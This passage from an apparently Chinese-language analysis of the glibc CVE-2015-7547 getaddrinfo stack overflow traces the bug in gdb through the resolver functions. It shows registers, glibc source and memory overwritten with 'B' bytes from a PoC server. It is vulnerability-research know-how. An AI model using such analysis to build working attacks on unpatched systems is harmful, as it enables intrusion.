errnop=0xbffff0c4, herrnop=0xbffff0b0, ttlp=0x0) at nss_dns/dns-host.c:284\r\n#1 0xb7efddbc in gaih_inet (name=<optimized out>, \r\n name@entry=0x8048653 \"foo.bar.google.com\", service=<optimized out>, \r\n req=0xbffff23c, pai=0xbffff1fc, naddrs=0xbffff1c4)\r\n at ../sysdeps/posix/getaddrinfo.c:862\r\n#2 0xb7f0023e in __GI_getaddrinfo (name=<optimized out>, \r\n service=0x8048650 \"22\", hints=0xbffff23c, pai=0xbffff234)\r\n at ../sysdeps/posix/getaddrinfo.c:2417\r\n#3 0x08048588 in main ()\r\n#4 0xb7e4d5cb in __libc_start_main (main=0x804853b <main>, argc=0x1, \r\n argv=0xbffff314, init=0x80485d0 <__libc_csu_init>, \r\n fini=0x8048630 <__libc_csu_fini>, rtld_fini=0xb7feb210 <_dl_fini>, \r\n stack_end=0xbffff30c) at libc-start.c:289\r\n#5 0x08048461 in _start ()\r\n```\r\n\r\n\u6574\u4e2a\u8fc7\u7a0b\u8c03\u7528\u975e\u5e38\u6e05\u6670\uff0c#3\u4f4d\u7f6e\u5728\u4e3b\u51fd\u6570\u91cc\uff0c\u7d27\u63a5\u7740#2\u8c03\u7528\u4e86\u6211\u4eec\u7684\u6f0f\u6d1e\u51fd\u6570getaddrinfo\uff0c\u8c03\u7528\u540e\u67d0\u4e2a\u4f4d\u7f6e\u6211\u4eec\u8c03\u7528\u4e86nss_dns_gethostbyname4_r\u51fd\u6570\uff0c\u5728\u5230\u8fbe\u6b64\u51fd\u6570\u65f6\uff0c\u6211\u4eec\u5728poc\u7aef\u8fdb\u884c\u89c2\u5bdf\uff0c\u53d1\u73b0poc\u5e76\u6ca1\u6709\u53d1\u9001\u7578\u5f62\u5b57\u7b26\u4e32\uff0c\u5728\u6b64\u51fd\u6570\u5165\u53e3\uff0c\u6211\u4eec\u901a\u8fc7\u53c2\u6570\u89c2\u5bdf\uff0c\u4e5f\u6ca1\u6709\u770b\u5230\u6709\u7578\u5f62\u5b57\u7b26\u4e32\u52a0\u8f7d\u8fdb\u6765\u3002\r\n\r\n\u8fd9\u4e00\u70b9\u8bf4\u660e\u5728getaddrinfo\u51fd\u6570\u5230nss_dns_gethostbyname\u4e4b\u95f4\u6ca1\u6709\u6d89\u53ca\u5230\u7578\u5f62\u5b57\u7b26\u4e32\u83b7\u53d6\uff0c\u4e5f\u5c31\u662f\u8bf4\u548c\u6f0f\u6d1e\u65e0\u5173\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u8df3\u8fc7\u8fd9\u6bb5\u8c03\u8bd5\uff0c\u76f4\u63a5\u4ece_nss_gethostbyname4_r\u5165\u624b\u7ee7\u7eed\u5bfb\u627e\u3002\r\n\r\n\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u901a\u8fc7\u6700\u5f00\u59cb\u7684bt\u5806\u6808\u8c03\u75
28\uff0c\u5bf9\u540e\u9762\u51e0\u4e2a\u51fd\u6570\u8fdb\u884c\u5206\u6790\uff0c\u5982\u679c\u60f3\u5728\u4e4b\u540e\u7684\u8c03\u7528\u4f4d\u7f6e\u4e0b\u65ad\u70b9\uff0c\u9700\u8981\u7ee7\u7eed\u5bf9libresolv.so.2\u7684\u52a0\u8f7d\u8fdb\u884c\u8ddf\u8e2a\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u4e3a\u4e86\u80fd\u591f\u5feb\u901f\u5b9a\u4f4d\uff0c\u6211\u4eec\u5c31\u5229\u7528\u6700\u5f00\u59cb\u56de\u6eaf\u5806\u6808\u8c03\u7528\u7ed9\u4e88\u7684\u4fe1\u606f\uff0c\u5bf9#0\uff0c#1\uff0c#2\u4e09\u5904\u4e0b\u65ad\u70b9\uff0c\u9996\u5148\u5229\u7528catch load libresolv.so.2\u5bf9\u52a8\u6001\u94fe\u63a5\u5e93\u4e0b\u65ad\u70b9\uff0c\u4e2d\u65ad\u540e\uff0c\u6211\u4eec\u9996\u5148\u6765\u5230\u7b2c\u4e00\u4e2a#2\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nsearch\r\nBreakpoint 4 at 0xb7df5240: file res_query.c, line 342.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xffffffb8 \r\nEBX: 0xb7e0d000 --> 0x5ec8 \r\nECX: 0xbfffe200 --> 0x0 \r\nEDX: 0x0 \r\nESI: 0xb7e35940 (0xb7e35940)\r\nEDI: 0x8048653 (\"foo.bar.google.com\")\r\nEBP: 0xbfffea68 --> 0xbfffefa8 --> 0xbffff0d8 --> 0xbffff128 --> 0x0 \r\nESP: 0xbfffe1cc --> 0xb7e09590 (<_nss_dns_gethostbyname4_r+192>:\tadd esp,0x30)\r\nEIP: 0xb7df5240 (<__GI___libc_res_nsearch>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df5238 <__GI___res_hostalias+440>:\tret \r\n 0xb7df5239 <__GI___res_hostalias+441>:\t\r\n call 0xb7dfca50 <__stack_chk_fail_local>\r\n 0xb7df523e:\txchg ax,ax\r\n=> 0xb7df5240 <__GI___libc_res_nsearch>:\tpush ebp\r\n 0xb7df5241 <__GI___libc_res_nsearch+1>:\tpush edi\r\n 0xb7df5242 <__GI___libc_res_nsearch+2>:\tpush esi\r\n 0xb7df5243 <__GI___libc_res_nsearch+3>:\tpush ebx\r\n 0xb7df5244 <__GI___libc_res_nsearch+4>:\t\r\n call 0xb7df06e0 
<__x86.get_pc_thunk.bx>\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 4, __GI___libc_res_nsearch (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:342\r\n342\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u51fd\u6570\u8c03\u7528\u65f6\uff0c\u8fd8\u662f\u6211\u4eec\u7a0b\u5e8f\u5bf9\u5e94\u7684\u5730\u5740\u5185\u5bb9\uff0c\u90a3\u4e48\u63a5\u4e0b\u6765\uff0c\u5230\u8fbe#1\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nquerydomain\r\nBreakpoint 5 at 0xb7df4eb0: file res_query.c, line 563.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xb7fd6340 --> 0x5 \r\nEBX: 0xb7e04000 --> 0x14ed4 \r\nECX: 0xbfffea2c --> 0xbfffe200 --> 0x0 \r\nEDX: 0x8048653 (\"foo.bar.google.com\")\r\nESI: 0x3 \r\nEDI: 0xb7fd6340 --> 0x5 \r\nEBP: 0xbfffea30 --> 0x0 \r\nESP: 0xbfffdd2c --> 0xb7df54cb (<__GI___libc_res_nsearch+651>:\tadd esp,0x30)\r\nEIP: 0xb7df4eb0 (<__libc_res_nquerydomain>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df4ea4 <__GI___libc_res_nquery+1716>:\tpush eax\r\n 0xb7df4ea5 <__GI___libc_res_nquery+1717>:\t\r\n call 0xb7df0680 <__assert_fail@plt>\r\n 0xb7df4eaa:\tlea esi,[esi+0x0]\r\n=> 0xb7df4eb0 <__libc_res_nquerydomain>:\tpush ebp\r\n 0xb7df4eb1 <__libc_res_nquerydomain+1>:\tpush edi\r\n 0xb7df4eb2 <__libc_res_nquerydomain+2>:\tmov edi,eax\r\n 0xb7df4eb4 <__libc_res_nquerydomain+4>:\tpush esi\r\n 0xb7df4eb5 <__libc_res_nquerydomain+5>:\tpush 
ebx\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 5, __libc_res_nquerydomain (\r\n statp=statp@entry=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=name@entry=0x8048653 \"foo.bar.google.com\", domain=0x0, class=0x1, \r\n type=0xf371, answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:563\r\n563\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\uff0c\u6b64\u65f6\u8fd8\u662f\u6b63\u5e38\uff0c\u63a5\u4e0b\u6765\u6765\u5230#0\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ b __libc_res_nquery\r\nBreakpoint 6 at 0xb7df47f0: file res_query.c, line 124.\r\ngdb-peda$ run\r\nStarting program: /opt/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x11 \r\nEBX: 0xb7e04000 --> 0x14ed4 \r\nECX: 0x13 \r\nEDX: 0x5 \r\nESI: 0x8048653 (\"foo.bar.google.com\")\r\nEDI: 0xb7fd6340 --> 0x5 \r\nEBP: 0x0 \r\nESP: 0xbfffd8ac --> 0xb7df4fa1 (<__libc_res_nquerydomain+241>:\tadd esp,0x30)\r\nEIP: 0xb7df47f0 (<__GI___libc_res_nquery>:\tpush ebp)\r\nEFLAGS: 0x292 (carry parity ADJUST zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df47eb:\txchg ax,ax\r\n 0xb7df47ed:\txchg ax,ax\r\n 0xb7df47ef:\tnop\r\n=> 0xb7df47f0 <__GI___libc_res_nquery>:\tpush ebp\r\n 0xb7df47f1 <__GI___libc_res_nquery+1>:\tmov edx,0x220\r\n 0xb7df47f6 <__GI___libc_res_nquery+6>:\tmov ebp,esp\r\n 0xb7df47f8 <__GI___libc_res_nquery+8>:\tpush edi\r\n 0xb7df47f9 <__GI___libc_res_nquery+9>:\tpush esi\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 6, __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, 
type=0xf371, \r\n answer=0xbfffe200 \"\", anslen=0x800, answerp=0xbfffea2c, \r\n answerp2=0xbfffea30, nanswerp2=0xbfffea34, resplen2=0xbfffea38, \r\n answerp2_malloced=0xbfffea3c) at res_query.c:124\r\n124\tres_query.c: No such file or directory.\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\u6b64\u65f6\u4f9d\u7136\u6b63\u5e38\uff0c\u8fd9\u8bf4\u660e\u6f0f\u6d1e\u4f4d\u7f6e\u5c31\u51fa\u73b0\u5728libc_res_nquery\u51fd\u6570\u4e2d\uff0c\u90a3\u4e48\u6211\u4eec\u63a5\u4e0b\u6765\uff0c\u5728\u5bf9\u6b64\u51fd\u6570\u8fdb\u884c\u8ddf\u8e2a\u5206\u6790\u4e4b\u524d\uff0c\u6211\u4eec\u6765\u901a\u8fc7\u6e90\u7801\u6765\u603b\u7ed3\u4e00\u4e0b\u4e4b\u524d\u7684\u8c03\u7528\u8fc7\u7a0b\u3002\r\n\r\n```\r\n_nss_dns_gethostbyname4_r (const char *name, struct gaih_addrtuple **pat,\r\n\t\t\t char *buffer, size_t buflen, int *errnop,\r\n\t\t\t int *herrnop, int32_t *ttlp)\r\n{\r\n \u2026\u2026\r\n//\u7701\u7565\u8fc7\u7a0b\r\n \u2026\u2026\r\n host_buffer.buf = orig_host_buffer = (querybuf *) alloca (2048);//\u5f00\u8f9f2048\u7a7a\u95f4\uff0c\u91cd\u8981\uff01\r\n u_char *ans2p = NULL;\r\n int nans2p = 0;\r\n int resplen2 = 0;\r\n int ans2p_malloced = 0;\r\n\r\n int olderr = errno;\r\n enum nss_status status;\r\n //\u8c03\u7528__libc_res_nsearch\r\n int n = __libc_res_nsearch (&_res, name, C_IN, T_UNSPEC,\r\n\t\t\t host_buffer.buf->buf, 2048, &host_buffer.ptr,\r\n\t\t\t &ans2p, &nans2p, &resplen2, 
&ans2p_malloced);\r\n```\r\n\r\n\u53ef\u4ee5\u770b\u5230\u8fd9\u91cc\u4e3ahost_buffer\u4f5c\u4e3aquerybuf\u5f00\u8f9f\u4e862048\u5b57\u8282\u7684\u7f13\u51b2\u533a\uff0c\u8fd9\u4e5f\u662f\u540e\u9762\u6f0f\u6d1e\u5728res_nquery\u5f62\u6210\u7684\u5173\u952e\u70b9\u3002\u6211\u5c06\u51e0\u6b21\u51fd\u6570\u8c03\u7528\u5199\u5728\u4e00\u8d77\uff0c\u7701\u7565\u4e86\u90e8\u5206\u8fc7\u7a0b\uff08\u6bd5\u7adf\u4e0d\u91cd\u8981\uff09\uff0c\u8fd9\u91cc\u6211\u4eec\u8fd8\u89c2\u5bdf\u4e00\u4e0blibc_res_nsearch\u8c03\u7528\u7684\u7b2c\u4e94\u4e2a\u53c2\u6570\uff0c\u4e5f\u5c31\u662f2048\u7a7a\u95f4\u5bf9\u5e94\u7684\u5730\u5740\u4f4d\u7f6e\uff0c\u63a5\u4e0b\u6765\u3002\r\n\r\n```\r\nint\r\n__libc_res_nsearch(res_state statp,\r\n\t\t const char *name,\t/* domain name */\r\n\t\t int class, int type,\t/* class and type of query */\r\n\t\t u_char *answer,\t/* buffer to put answer */\r\n\t\t int anslen,\t\t/* size of answer */\r\n\t\t u_char **answerp,\r\n\t\t u_char **answerp2,\r\n\t\t int *nanswerp2,\r\n\t\t int *resplen2,\r\n\t\t int *answerp2_malloced)\r\n{\r\n\t\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n//\u8c03\u7528_libc_res_nquerydomain\r\n\t\tret = __libc_res_nquerydomain(statp, name, NULL, class, type, \r\n\t\t\t\t\t answer, anslen, answerp,\r\n\t\t\t\t\t answerp2, nanswerp2, resplen2,\r\n\t\t\t\t\t answerp2_malloced);\r\n```\r\n\r\n\u8fd8\u8bb0\u5f97\u521a\u624d\u6211\u4eec\u63d0\u5230\u7684\u7b2c\u4e94\u4e2a\u53c2\u6570\u5417\uff0c\u5c31\u662f\u73b0\u5728\u7684*answerp\uff0c\u7d27\u63a5\u7740\u7ee7\u7eed\u8c03\u7528\u5230\u6700\u540e\u7684\u5904\u7406\u51fd\u6570\u3002\r\n\r\n```\r\nstatic int\r\n__libc_res_nquerydomain(res_state statp,\r\n\t\t\tconst char *name,\r\n\t\t\tconst char *domain,\r\n\t\t\tint class, int type,\t/* class and type of query */\r\n\t\t\tu_char *answer,\t\t/* buffer to put answer */\r\n\t\t\tint anslen,\t\t\t/* size of answer */\r\n\t\t\tu_char **answerp,\r\n\t\t\tu_char **answerp2,\r\n\t\t\tint *nanswerp2,\r\n\t\t\tint 
*resplen2,\r\n\t\t\tint *answerp2_malloced)\r\n{\r\n\t\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n//\u8c03\u7528libc_res_nquery\r\n\treturn (__libc_res_nquery(statp, longname, class, type, answer,\r\n\t\t\t\t anslen, answerp, answerp2, nanswerp2,\r\n\t\t\t\t resplen2, answerp2_malloced));\r\n}\r\n```\r\n\r\n\u8fd8\u662fanswer\u53d8\u91cf\u503c\u5f97\u5173\u6ce8\uff0c\u63a5\u4e0b\u6765\u7684\u5206\u6790\u4e2d\u4f1a\u63d0\u5230\u8fd9\u4e00\u70b9\uff0c\u8fd9\u4e2aanswer\u51fd\u6570\u5bf9\u5e94\u7684\u4f4d\u7f6e\u5c31\u662f\u5df2\u7ecf\u5206\u914d\u76842048\u7a7a\u95f4\uff0c\u800c\u5728\u51fd\u6570\u8fdb\u884cread\u64cd\u4f5c\u65f6\uff0c\u5e76\u6ca1\u6709\u5bf9DNS\u8fd4\u56de\u7684\u5b57\u7b26\u4e32\u7578\u5f62\u68c0\u67e5\uff0c\u800c\u76f4\u63a5\u62f7\u8d1d\u5b57\u7b26\u4e32\u4e86\u5230\u6570\u7ec4\u7a7a\u95f4\u4e86\uff01\r\n\r\n\u90a3\u4e48\u8fdb\u5165\u5230res_nquery\u4e4b\u540e\uff0c\u6211\u4eec\u9700\u8981\u5bf9\u8fd9\u4e2a\u51fd\u6570\u8fdb\u884c\u5355\u6b65\u8ddf\u8e2a\u5206\u6790\uff0c\u56e0\u4e3a\u4e00\u76f4\u5230\u8fd9\u4e2a\u51fd\u6570\u524d\uff0cPoC\u7aef\u90fd\u6ca1\u6709\u53cd\u5e94\uff0c\u53ef\u89c1\u6b64\u65f6\u8fd8\u662f\u5728\u672c\u673a\u8fdb\u884c\u4e86\u4e00\u4e9b\u8bfb\u53d6\u64cd\u4f5c\uff0c\u540e\u9762\u67e5\u8be2\u64cd\u4f5c\u65f6\uff0c\u624d\u6d89\u53ca\u5230\u548cDNS\u4ea4\u4e92\u3002\u5355\u6b65\u8ddf\u8e2a\uff0c\u5728\u67d0\u51fd\u6570\u4f4d\u7f6e\u53d1\u73b0\u4e86\u95ee\u9898\u3002\r\n\r\n```\r\ngdb-peda$ run\r\nStarting program: /root/Desktop/CVE-2015-7547-master/CVE-2015-7547-master/gclient \r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x804c728 --> 0x35000002 \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0x0 \r\nEDX: 0xb7fd6340 --> 0x5 \r\nESI: 0x0 \r\nEDI: 0xb7fd6514 --> 0xffffffff \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd5d0 --> 0xbfffd764 --> 0x1006d \r\nEIP: 0xb7df3702 (<__libc_res_nsend+354>:\tmov eax,DWORD PTR [esp+0x158])\r\nEFLAGS: 0x246 (carry PARITY adjust ZERO sign 
trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df36f6 <__libc_res_nsend+342>:\tmov esi,DWORD PTR [esp+0x1c]\r\n 0xb7df36fa <__libc_res_nsend+346>:\ttest esi,esi\r\n 0xb7df36fc <__libc_res_nsend+348>:\t\r\n jne 0xb7df4145 <__libc_res_nsend+2981>\r\n=> 0xb7df3702 <__libc_res_nsend+354>:\tmov eax,DWORD PTR [esp+0x158]\r\n 0xb7df3709 <__libc_res_nsend+361>:\tmov esi,DWORD PTR [ebp+0x0]\r\n 0xb7df370c <__libc_res_nsend+364>:\tmov DWORD PTR [esp+0x9c],0x0\r\n 0xb7df3717 <__libc_res_nsend+375>:\tmov DWORD PTR [esp+0x74],eax\r\n 0xb7df371b <__libc_res_nsend+379>:\tmov eax,DWORD PTR [esp+0x4]\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n\r\nBreakpoint 2, __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\362 \\001\", buflen=0x24, buf2=0xbfffd764 \"m\", \r\n buflen2=0x24, ans=0xbfffe340 \"\", anssiz=0x800, ansp=0xbfffeb6c, \r\n ansp2=0xbfffeb70, nansp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n ansp2_malloced=0xbfffeb7c) at res_send.c:564\r\n564\tres_send.c: No such file or directory.\r\n```\r\n\r\n\u6211\u4eec\u8fdb\u5165\u5230\u4e00\u5904res_nsend\u51fd\u6570\uff0c\u5728\u8fdb\u5165\u524d\u4e00\u5207\u8fd8\u6b63\u5e38\uff0c\u6211\u4eec\u76f4\u63a5\u901a\u8fc7finish\u6765\u6267\u884c\u5230\u51fd\u6570\u8fd4\u56de\u4f4d\u7f6e\u3002\r\n\r\n```\r\ngdb-peda$ finish\r\nRun till exit from #0 __libc_res_nsend (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"\\362 \\001\", buflen=0x24, buf2=0xbfffd764 \"m\", \r\n buflen2=0x24, ans=0xbfffe340 \"\", anssiz=0x800, ansp=0xbfffeb6c, \r\n ansp2=0xbfffeb70, nansp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n ansp2_malloced=0xbfffeb7c) at res_send.c:564\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0xbcc \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0x1 \r\nEDX: 0xffffffff \r\nESI: 0xb7fd6340 --> 0x5 \r\nEDI: 0xbfffe340 
--> 0x4242006d ('m')\r\nEBP: 0xbfffd9e8 --> 0x0 \r\nESP: 0xbfffd710 --> 0xb7fd6340 --> 0x5 \r\nEIP: 0xb7df191b (<__GI___libc_res_nquery+299>:\tmov DWORD PTR [ebp-0x30],eax)\r\nEFLAGS: 0x286 (carry PARITY adjust zero SIGN trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df1912 <__GI___libc_res_nquery+290>:\tpush DWORD PTR [ebp-0x30]\r\n 0xb7df1915 <__GI___libc_res_nquery+293>:\tpush esi\r\n 0xb7df1916 <__GI___libc_res_nquery+294>:\t\r\n call 0xb7df35a0 <__libc_res_nsend>\r\n=> 0xb7df191b <__GI___libc_res_nquery+299>:\tmov DWORD PTR [ebp-0x30],eax\r\n 0xb7df191e <__GI___libc_res_nquery+302>:\tmov eax,DWORD PTR [ebp-0x40]\r\n 0xb7df1921 <__GI___libc_res_nquery+305>:\tadd esp,0x30\r\n 0xb7df1924 <__GI___libc_res_nquery+308>:\ttest eax,eax\r\n 0xb7df1926 <__GI___libc_res_nquery+310>:\t\r\n jne 0xb7df1b50 <__GI___libc_res_nquery+864>\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd710 --> 0xb7fd6340 --> 0x5 \r\n0004| 0xbfffd714 --> 0xbfffd740 --> 0x120f2 \r\n0008| 0xbfffd718 --> 0x24 ('$')\r\n0012| 0xbfffd71c --> 0xbfffd764 --> 0x1006d \r\n0016| 0xbfffd720 --> 0x24 ('$')\r\n0020| 0xbfffd724 --> 0xbfffe340 --> 0x4242006d ('m')\r\n0024| 0xbfffd728 --> 0x10000 \r\n0028| 0xbfffd72c --> 0xbfffeb6c ('B' <repeats 200 times>...)\r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n0xb7df191b in __GI___libc_res_nquery (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n name=0x8048653 \"foo.bar.google.com\", class=0x1, type=0xf371, \r\n answer=0xbfffe340 \"m\", anslen=0x800, answerp=0xbfffeb6c, \r\n answerp2=0xbfffeb70, nanswerp2=0xbfffeb74, resplen2=0xbfffeb78, \r\n answerp2_malloced=0xbfffeb7c) at res_query.c:227\r\n227\tres_query.c: No such file or 
directory.\r\n```\r\n\r\n\r\n\u5728\u4ee3\u7801\u533a\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230\u73b0\u5728\u6240\u5904\u7684\u4f4d\u7f6e\u662f0xb7df191b\u7684\u4f4d\u7f6e\uff0c\u800c\u5728\u8fd9\u4e2a\u4f4d\u7f6e\u4e0a\u9762\u7684\u5730\u5740\uff0c\u6267\u884c\u4e86call __libc_res_nsend\u51fd\u6570\uff0c\u5f53\u51fd\u6570\u8fd4\u56de\u540e\uff0c\u6211\u4eec\u53d1\u73b0\u5728\u6808\u4e2dbfffeb6c\u7684\u4f4d\u7f6e\uff0c\u51fa\u73b0\u4e86\u6211\u4eec\u7684\u7578\u5f62\u5b57\u7b26\u4e32B\uff0c\u800cPoC\u7aef\u6b64\u65f6\u4e5f\u6267\u884c\u4e86\u53d1\u9001\u64cd\u4f5c\u3002\u6211\u4eec\u6765\u770b\u4e00\u4e0bbfffeb6c\u6b64\u65f6\u7684\u503c\u3002\r\n\r\n```\r\n0xbfffeb9c:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffeba4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebac:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebb4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebbc:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebc4:\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\t0x42\r\n0xbfffebcc:\t0x42\t0x42\t0x42\t0x42\r\n```\r\n\r\n\u5df2\u7ecf\u8986\u76d6\u4e86\u5927\u91cf\u768442424242\uff0c\u90a3\u4e48\u6211\u4eec\u53ef\u4ee5\u5b9a\u4f4d\u51fa\u73b0\u95ee\u9898\u7684\u5730\u65b9\u5728__libc_res_nsend\u4e2d\u3002\u5728res_query.c\u4e2d\uff0c\u6211\u4eec\u53ef\u4ee5\u770b\u5230res_nquery\u51fd\u6570\u5bf9res_nsend\u7684\u8c03\u7528\u3002\u800c\u4e14\u4e5f\u53ea\u6709\u8fd9\u4e00\u5904\u8c03\u7528\u4e86res_nsend\u3002\r\n\r\n```\r\nint\r\n__libc_res_nquery(res_state statp,\r\n\t\t const char *name,\t/* domain name */\r\n\t\t int class, int type,\t/* class and type of query */\r\n\t\t u_char *answer,\t/* buffer to put answer */\r\n\t\t int anslen,\t\t/* size of answer buffer */\r\n\t\t u_char **answerp,\t/* if buffer needs to be enlarged */\r\n\t\t u_char **answerp2,\r\n\t\t int *nanswerp2,\r\n\t\t int *resplen2,\r\n\t\t int *answerp2_malloced)\r\n{\r\n\tHEADER *hp = (HEADER *) answer;\r\n\tHEADER *hp2;\r\n\tint n, 
use_malloc = 0;\r\n\tu_int oflags = statp->_flags;\r\n\u2026\u2026\r\n\u7701\u7565\u8fc7\u7a0b\r\n\u2026\u2026\r\n\tassert (answerp == NULL || (void *) *answerp == (void *) answer);\r\n//\u6f0f\u6d1e\u89e6\u53d1\u51fd\u6570\r\n\tn = __libc_res_nsend(statp, query1, nquery1, query2, nquery2, answer,\r\n\t\t\t anslen, answerp, answerp2, nanswerp2, resplen2,\r\n\t\t\t answerp2_malloced);\r\n\tif (use_malloc)\r\n\t\tfree (buf);\r\n```\r\n\r\n\u63a5\u4e0b\u6765\uff0c\u6211\u4eec\u8981\u7740\u91cd\u5173\u6ce8\u4e00\u4e0blibc_res_nsend\u51fd\u6570\uff0c\u9996\u5148\u6211\u4eec\u8ddf\u8e2a\u8c03\u8bd5\u65f6\u53d1\u73b0\u7a0b\u5e8f\u4f1a\u8fdb\u5165\u4e00\u5904if\u8bed\u53e5\u5224\u65ad\uff0c\u8fdb\u5165send_vc\u548csend_dg\u51fd\u6570\uff0c\u5728send_vc\u51fd\u6570\u4e2d\u53d1\u73b0\u4e86socket\u548cconnect\u8fde\u63a5\u8bed\u53e5\uff0c\u5728\u8fde\u63a5\u8bed\u53e5\u6267\u884c\u7ed3\u675f\u65f6\uff0cpoc\u7aef\u63d0\u793aconnect 127.0.0.1\uff0c\u4e5f\u5c31\u662f\u6267\u884c\u4e86\u8fde\u63a5\u64cd\u4f5c\u3002\r\n\r\n```\r\ngdb-peda$ n\r\n[----------------------------------registers-----------------------------------]\r\nEAX: 0x3 \r\nEBX: 0xb7e01000 --> 0x14ed4 \r\nECX: 0xbfffd2e0 --> 0x2 \r\nEDX: 0xb7e01000 --> 0x14ed4 \r\nESI: 0xbfffeb78 --> 0x0 \r\nEDI: 0xb7fd6514 --> 0xffffffff \r\nEBP: 0xb7fd6340 --> 0x5 \r\nESP: 0xbfffd2e0 --> 0x2 \r\nEIP: 0xb7df2b64 (<send_vc+244>:\tadd esp,0x10)\r\nEFLAGS: 0x203 (CARRY parity adjust zero sign trap INTERRUPT direction overflow)\r\n[-------------------------------------code-------------------------------------]\r\n 0xb7df2b5b <send_vc+235>:\tmovzx eax,WORD PTR [eax]\r\n 0xb7df2b5e <send_vc+238>:\tpush eax\r\n 0xb7df2b5f <send_vc+239>:\tcall 0xb7ded620 <socket@plt>\r\n=> 0xb7df2b64 <send_vc+244>:\tadd esp,0x10\r\n 0xb7df2b67 <send_vc+247>:\ttest eax,eax\r\n 0xb7df2b69 <send_vc+249>:\tmov DWORD PTR [ebp+0x1c4],eax\r\n 0xb7df2b6f <send_vc+255>:\tjs 0xb7df312a <send_vc+1722>\r\n 0xb7df2b75 <send_vc+261>:\tmov edi,DWORD PTR 
[esp+0x48]\r\n[------------------------------------stack-------------------------------------]\r\n0000| 0xbfffd2e0 --> 0x2 \r\n0004| 0xbfffd2e4 --> 0x1 \r\n0008| 0xbfffd2e8 --> 0x0 \r\n0012| 0xbfffd2ec --> 0xb7e433e8 --> 0x72647800 ('')\r\n0016| 0xbfffd2f0 --> 0xb7fd8900 --> 0xb7e36000 --> 0x464c457f \r\n0020| 0xbfffd2f4 --> 0xbfffeb74 --> 0x0 \r\n0024| 0xbfffd2f8 --> 0xbfffeb6c --> 0x804c748 --> 0x8083ab32 \r\n0028| 0xbfffd2fc --> 0xbfffd728 --> 0x10000 \r\n[------------------------------------------------------------------------------]\r\nLegend: code, data, rodata, value\r\n725\tin res_send.c\r\n\r\nBreakpoint 2, send_vc (statp=0xb7fd6340 <_res@GLIBC_2.0>, \r\n buf=0xbfffd740 \"B6\\001\", buflen=0x24, buf2=0xbfffd764 \"\\t\\374\\001\", \r\n buflen2=0x24, ansp=0xbfffd65c, anssizp=0xbfffd728, terrno=0xbfffd668, \r\n ns=0x0, anscp=0xbfffeb6c, ansp2=0xbfffeb70, anssizp2=0xbfffeb74, \r\n 